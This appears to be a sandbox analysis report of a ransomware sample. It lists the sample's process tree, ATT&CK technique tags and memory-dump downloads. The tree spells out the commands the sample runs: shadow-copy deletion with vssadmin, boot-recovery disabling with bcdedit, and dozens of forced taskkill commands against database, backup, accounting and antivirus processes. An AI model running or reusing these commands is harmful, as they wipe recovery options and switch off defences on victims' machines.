C:\Windows\system32\cmd.exe
cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Suspicious use of WriteProcessMemory
PID:276

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
3⤵
- Modifies boot configuration data using bcdedit
PID:912

C:\Windows\system32\cmd.exe
cmd /C vssadmin.exe Delete Shadows /All /Quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:1408

C:\Windows\system32\cmd.exe
cmd /C C:\Windows\system32\vssvc.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:372

C:\Windows\system32\VSSVC.exe
C:\Windows\system32\vssvc.exe
3⤵
PID:1040

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM wxServer*
2⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wxServer*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBFCService*
2⤵
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBFCService*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBVSS*
2⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBVSS*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sql*
2⤵
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sql*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM msaccess*
2⤵
PID:1792

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msaccess*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM mssql*
2⤵
PID:804

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mssql*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM mysql*
2⤵
PID:840

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mysql*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM wxServerView*
2⤵
PID:1472

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wxServerView*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqlmangr*
2⤵
PID:1824

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlmangr*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM RAgui*
2⤵
PID:204

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RAgui*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM supervise*
2⤵
PID:1744

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM supervise*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1140

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Culture*
2⤵
PID:1780

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Culture*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:360

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Defwatch*
2⤵
PID:420

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Defwatch*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM winword*
2⤵
PID:908

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM winword*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBW32*
2⤵
PID:1296

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBW32*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBDBMgr*
2⤵
PID:372

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBDBMgr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM qbupdate*
2⤵
PID:1740

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM qbupdate*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM axlbridge*
2⤵
PID:2024

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM axlbridge*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM httpd*
2⤵
PID:1248

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM httpd*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM fdlauncher*
2⤵
PID:920

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fdlauncher*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MsDtSrvr*
2⤵
PID:1792

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MsDtSrvr*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM java*
2⤵
PID:804

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM java*
3⤵
- Kills process with taskkill
PID:2036

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM 360se*
2⤵
PID:840

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM 360se*
3⤵
- Kills process with taskkill
PID:228

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM 360doctor*
2⤵
PID:1472

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM 360doctor*
3⤵
- Kills process with taskkill
PID:1736

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM wdswfsafe*
2⤵
PID:1824

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wdswfsafe*
3⤵
- Kills process with taskkill
PID:848

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM fdhost*
2⤵
PID:204

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fdhost*
3⤵
- Kills process with taskkill
PID:684

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM GDscan*
2⤵
PID:928

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM GDscan*
3⤵
- Kills process with taskkill
PID:924

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM ZhuDongFangYu*
2⤵
PID:1780

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ZhuDongFangYu*
3⤵
- Kills process with taskkill
PID:1556

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBDBMgrN*
2⤵
PID:1504

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBDBMgrN*
3⤵
- Kills process with taskkill
PID:1952

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM mysqld*
2⤵
PID:908

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM mysqld*
3⤵
PID:232

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM AutodeskDesktopApp*
2⤵
PID:1296

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AutodeskDesktopApp*
3⤵
- Kills process with taskkill
PID:1500

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM acwebbrowser*
2⤵
PID:372

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM acwebbrowser*
3⤵
PID:1108

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Creative Cloud*
2⤵
PID:1740

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Creative Cloud*
3⤵
PID:1064

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Adobe Desktop Service*
2⤵
PID:360

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Adobe Desktop Service*
3⤵
- Kills process with taskkill
PID:1100

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM CoreSync*
2⤵
PID:1352

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM CoreSync*
3⤵
- Kills process with taskkill
PID:1756

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Adobe CEF Helper*
2⤵
PID:1480

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Adobe CEF Helper*
3⤵
PID:1488

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM node*
2⤵
PID:276

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM node*
3⤵
- Kills process with taskkill
PID:2036

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM AdobeIPCBroker*
2⤵
PID:1776

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AdobeIPCBroker*
3⤵
- Kills process with taskkill
PID:1836

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sync-taskbar*
2⤵
PID:804

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sync-taskbar*
3⤵
- Kills process with taskkill
PID:1144

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sync-worker*
2⤵
PID:216

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sync-worker*
3⤵
- Kills process with taskkill
PID:1336

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM InputPersonalization*
2⤵
PID:1768

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM InputPersonalization*
3⤵
- Kills process with taskkill
PID:968

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM AdobeCollabSync*
2⤵
PID:1248

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AdobeCollabSync*
3⤵
- Kills process with taskkill
PID:340

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM BrCtrlCntr*
2⤵
PID:928

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM BrCtrlCntr*
3⤵
- Kills process with taskkill
PID:1300

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM BrCcUxSys*
2⤵
PID:1040

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM BrCcUxSys*
3⤵
- Kills process with taskkill
PID:1936

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SimplyConnectionManager*
2⤵
PID:2000

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SimplyConnectionManager*
3⤵
- Kills process with taskkill
PID:2016

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
2⤵
PID:1792

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Simply.SystemTrayIcon*
3⤵
PID:1476

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM fbguard*
2⤵
PID:908

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fbguard*
3⤵
PID:1228

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM fbserver*
2⤵
PID:1408

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fbserver*
3⤵
PID:1824

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM ONENOTEM*
2⤵
PID:1484

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ONENOTEM*
3⤵
- Kills process with taskkill
PID:1524

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM wrapper*
2⤵
PID:1100

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wrapper*
3⤵
- Kills process with taskkill
PID:1780

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM DefWatch*
2⤵
PID:420

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM DefWatch*
3⤵
- Kills process with taskkill
PID:2008

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM ccEvtMgr*
2⤵
PID:1832

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ccEvtMgr*
3⤵
- Kills process with taskkill
PID:236

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM ccSetMgr*
2⤵
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ccSetMgr*
3⤵
- Kills process with taskkill
PID:1336

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SavRoam*
2⤵
PID:544

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SavRoam*
3⤵
PID:1840

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Sqlservr*
2⤵
PID:2044

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Sqlservr*
3⤵
PID:1868

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqlagent*
2⤵
PID:1484

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlagent*
3⤵
- Kills process with taskkill
PID:1556

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqladhlp*
2⤵
PID:1752

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqladhlp*
3⤵
PID:1772

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Culserver*
2⤵
PID:1432

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Culserver*
3⤵
- Kills process with taskkill
PID:2008

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM RTVscan*
2⤵
PID:228

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RTVscan*
3⤵
- Kills process with taskkill
PID:1548

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqlbrowser*
2⤵
PID:1456

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlbrowser*
3⤵
PID:1736

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLADHLP*
2⤵
PID:316

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLADHLP*
3⤵
- Kills process with taskkill
PID:848

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBIDPService*
2⤵
PID:968

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBIDPService*
3⤵
- Kills process with taskkill
PID:900

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
2⤵
PID:1708

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Intuit.QuickBooks.FCS*
3⤵
- Kills process with taskkill
PID:956

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBCFMonitorService*
2⤵
PID:924

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBCFMonitorService*
3⤵
PID:1780

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqlwriter*
2⤵
PID:552

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlwriter*
3⤵
- Kills process with taskkill
PID:1544

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM msmdsrv*
2⤵
PID:1996

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msmdsrv*
3⤵
- Kills process with taskkill
PID:1836

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM tomcat6*
2⤵
PID:1108

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM tomcat6*
3⤵
PID:276

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM zhudongfangyu*
2⤵
PID:588

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM zhudongfangyu*
3⤵
- Kills process with taskkill
PID:220

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM vmware-usbarbitator64*
2⤵
PID:936

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vmware-usbarbitator64*
3⤵
PID:968

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM vmware-converter*
2⤵
PID:1080

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vmware-converter*
3⤵
- Kills process with taskkill
PID:1708

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM dbsrv12*
2⤵
PID:2016

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM dbsrv12*
3⤵
PID:924

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM dbeng8*
2⤵
PID:1668

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM dbeng8*
3⤵
- Kills process with taskkill
PID:1972

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
2⤵
PID:1472

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##WID*
3⤵
- Kills process with taskkill
PID:1792

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
2⤵
PID:1064

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$VEEAMSQL2012*
3⤵
- Kills process with taskkill
PID:804

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
2⤵
PID:948

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
3⤵
- Kills process with taskkill
PID:316

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLBrowser*
2⤵
PID:1508

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLBrowser*
3⤵
- Kills process with taskkill
PID:1760

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLWriter*
2⤵
PID:1252

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLWriter*
3⤵
PID:1484

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM FishbowlMySQL*
2⤵
PID:1772

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FishbowlMySQL*
3⤵
PID:1752

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
2⤵
PID:1480

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##WID*
3⤵
- Kills process with taskkill
PID:552

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MySQL57*
2⤵
PID:228

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MySQL57*
3⤵
PID:1996

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
2⤵
PID:1456

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
3⤵
- Kills process with taskkill
PID:1736

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
2⤵
PID:608

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLServerADHelper100*
3⤵
- Kills process with taskkill
PID:588

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
2⤵
PID:928

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
3⤵
- Kills process with taskkill
PID:936

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM msftesql-Exchange*
2⤵
PID:1504

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msftesql-Exchange*
3⤵
PID:1248

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
2⤵
PID:1516

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
3⤵
- Kills process with taskkill
PID:2016

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
2⤵
PID:1848

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$SBSMONITORING*
3⤵
- Kills process with taskkill
PID:1144

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
2⤵
PID:236

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:480

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
2⤵
PID:1196

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
3⤵
- Kills process with taskkill
PID:1064

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
2⤵
PID:1524

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:684

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
2⤵
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$SBSMONITORING*
3⤵
- Kills process with taskkill
PID:1936

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
2⤵
PID:820

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$SHAREPOINT*
3⤵
PID:1252

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1352

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2e0
1⤵
PID:808

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Ejdgcj-decrypt.hta"
1⤵
- Modifies Internet Explorer settings
PID:1936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\Ejdgcj-decrypt.hta

Download Submit
memory/204-32-0x0000000000000000-mapping.dmp

Download
memory/204-64-0x0000000000000000-mapping.dmp

Download
memory/216-92-0x0000000000000000-mapping.dmp

Download
memory/220-149-0x0000000000000000-mapping.dmp

Download
memory/224-17-0x0000000000000000-mapping.dmp

Download
memory/228-130-0x0000000000000000-mapping.dmp

Download
memory/228-172-0x0000000000000000-mapping.dmp

Download
memory/228-59-0x0000000000000000-mapping.dmp

Download
memory/232-31-0x0000000000000000-mapping.dmp

Download
memory/232-73-0x0000000000000000-mapping.dmp

Download
memory/236-117-0x0000000000000000-mapping.dmp

Download
memory/236-186-0x0000000000000000-mapping.dmp

Download
memory/276-86-0x0000000000000000-mapping.dmp

Download
memory/276-8-0x0000000000000000-mapping.dmp

Download
memory/276-147-0x0000000000000000-mapping.dmp

Download
memory/316-49-0x0000000000000000-mapping.dmp

Download
memory/316-134-0x0000000000000000-mapping.dmp

Download
memory/316-5-0x0000000000000000-mapping.dmp

Download
memory/316-163-0x0000000000000000-mapping.dmp

Download
memory/340-97-0x0000000000000000-mapping.dmp

Download
memory/360-80-0x0000000000000000-mapping.dmp

Download
memory/360-37-0x0000000000000000-mapping.dmp

Download
memory/360-7-0x0000000000000000-mapping.dmp

Download
memory/372-76-0x0000000000000000-mapping.dmp

Download
memory/372-44-0x0000000000000000-mapping.dmp

Download
memory/372-12-0x0000000000000000-mapping.dmp

Download
memory/420-114-0x0000000000000000-mapping.dmp

Download
memory/420-38-0x0000000000000000-mapping.dmp

Download
memory/420-4-0x0000000000000000-mapping.dmp

Download
memory/480-187-0x0000000000000000-mapping.dmp

Download
memory/544-21-0x0000000000000000-mapping.dmp

Download
memory/544-120-0x0000000000000000-mapping.dmp

Download
memory/552-171-0x0000000000000000-mapping.dmp

Download
memory/552-142-0x0000000000000000-mapping.dmp

Download
memory/588-148-0x0000000000000000-mapping.dmp

Download
memory/588-177-0x0000000000000000-mapping.dmp

Download
memory/608-176-0x0000000000000000-mapping.dmp

Download
memory/684-65-0x0000000000000000-mapping.dmp

Download
memory/684-6-0x0000000000000000-mapping.dmp

Download
memory/684-191-0x0000000000000000-mapping.dmp

Download
memory/804-90-0x0000000000000000-mapping.dmp

Download
memory/804-24-0x0000000000000000-mapping.dmp

Download
memory/804-56-0x0000000000000000-mapping.dmp

Download
memory/804-161-0x0000000000000000-mapping.dmp

Download
memory/820-194-0x0000000000000000-mapping.dmp

Download
memory/840-26-0x0000000000000000-mapping.dmp

Download
memory/840-58-0x0000000000000000-mapping.dmp

Download
memory/848-63-0x0000000000000000-mapping.dmp

Download
memory/848-135-0x0000000000000000-mapping.dmp

Download
memory/900-137-0x0000000000000000-mapping.dmp

Download
memory/908-40-0x0000000000000000-mapping.dmp

Download
memory/908-72-0x0000000000000000-mapping.dmp

Download
memory/908-106-0x0000000000000000-mapping.dmp

Download
memory/912-9-0x0000000000000000-mapping.dmp

Download
memory/920-52-0x0000000000000000-mapping.dmp

Download
memory/920-20-0x0000000000000000-mapping.dmp

Download
memory/924-67-0x0000000000000000-mapping.dmp

Download
memory/924-155-0x0000000000000000-mapping.dmp

Download
memory/924-140-0x0000000000000000-mapping.dmp

Download
memory/928-98-0x0000000000000000-mapping.dmp

Download
memory/928-178-0x0000000000000000-mapping.dmp

Download
memory/928-66-0x0000000000000000-mapping.dmp

Download
memory/936-150-0x0000000000000000-mapping.dmp

Download
memory/936-179-0x0000000000000000-mapping.dmp

Download
memory/948-162-0x0000000000000000-mapping.dmp

Download
memory/956-139-0x0000000000000000-mapping.dmp

Download
memory/956-25-0x0000000000000000-mapping.dmp

Download
memory/968-151-0x0000000000000000-mapping.dmp

Download
memory/968-95-0x0000000000000000-mapping.dmp

Download
memory/968-136-0x0000000000000000-mapping.dmp

Download
memory/968-23-0x0000000000000000-mapping.dmp

Download
memory/1040-55-0x0000000000000000-mapping.dmp

Download
memory/1040-13-0x0000000000000000-mapping.dmp

Download
memory/1040-100-0x0000000000000000-mapping.dmp

Download
memory/1064-189-0x0000000000000000-mapping.dmp

Download
memory/1064-160-0x0000000000000000-mapping.dmp

Download
memory/1064-79-0x0000000000000000-mapping.dmp

Download
memory/1080-152-0x0000000000000000-mapping.dmp

Download
memory/1080-43-0x0000000000000000-mapping.dmp

Download
memory/1100-112-0x0000000000000000-mapping.dmp

Download
memory/1100-81-0x0000000000000000-mapping.dmp

Download
memory/1108-146-0x0000000000000000-mapping.dmp

Download
memory/1108-77-0x0000000000000000-mapping.dmp

Download
memory/1140-35-0x0000000000000000-mapping.dmp

Download
memory/1144-91-0x0000000000000000-mapping.dmp

Download
memory/1144-185-0x0000000000000000-mapping.dmp

Download
memory/1196-188-0x0000000000000000-mapping.dmp

Download
memory/1228-107-0x0000000000000000-mapping.dmp

Download
memory/1248-50-0x0000000000000000-mapping.dmp

Download
memory/1248-96-0x0000000000000000-mapping.dmp

Download
memory/1248-181-0x0000000000000000-mapping.dmp

Download
memory/1252-166-0x0000000000000000-mapping.dmp

Download
memory/1252-27-0x0000000000000000-mapping.dmp

Download
memory/1252-195-0x0000000000000000-mapping.dmp

Download
memory/1296-42-0x0000000000000000-mapping.dmp

Download
memory/1296-74-0x0000000000000000-mapping.dmp

Download
memory/1300-99-0x0000000000000000-mapping.dmp

Download
memory/1304-118-0x0000000000000000-mapping.dmp

Download
memory/1304-0-0x0000000000000000-mapping.dmp

Download
memory/1304-192-0x0000000000000000-mapping.dmp

Download
memory/1336-119-0x0000000000000000-mapping.dmp

Download
memory/1336-93-0x0000000000000000-mapping.dmp

Download
memory/1352-82-0x0000000000000000-mapping.dmp

Download
memory/1408-11-0x0000000000000000-mapping.dmp

Download
memory/1408-108-0x0000000000000000-mapping.dmp

Download
memory/1432-128-0x0000000000000000-mapping.dmp

Download
memory/1456-47-0x0000000000000000-mapping.dmp

Download
memory/1456-132-0x0000000000000000-mapping.dmp

Download
memory/1456-174-0x0000000000000000-mapping.dmp

Download
memory/1472-28-0x0000000000000000-mapping.dmp

Download
memory/1472-60-0x0000000000000000-mapping.dmp

Download
memory/1472-158-0x0000000000000000-mapping.dmp

Download
memory/1476-105-0x0000000000000000-mapping.dmp

Download
memory/1480-170-0x0000000000000000-mapping.dmp

Download
memory/1480-84-0x0000000000000000-mapping.dmp

Download
memory/1484-110-0x0000000000000000-mapping.dmp

Download
memory/1484-167-0x0000000000000000-mapping.dmp

Download
memory/1484-124-0x0000000000000000-mapping.dmp

Download
memory/1488-85-0x0000000000000000-mapping.dmp

Download
memory/1488-41-0x0000000000000000-mapping.dmp

Download
memory/1500-75-0x0000000000000000-mapping.dmp

Download
memory/1504-180-0x0000000000000000-mapping.dmp

Download
memory/1504-70-0x0000000000000000-mapping.dmp

Download
memory/1508-164-0x0000000000000000-mapping.dmp

Download
memory/1516-182-0x0000000000000000-mapping.dmp

Download
memory/1524-53-0x0000000000000000-mapping.dmp

Download
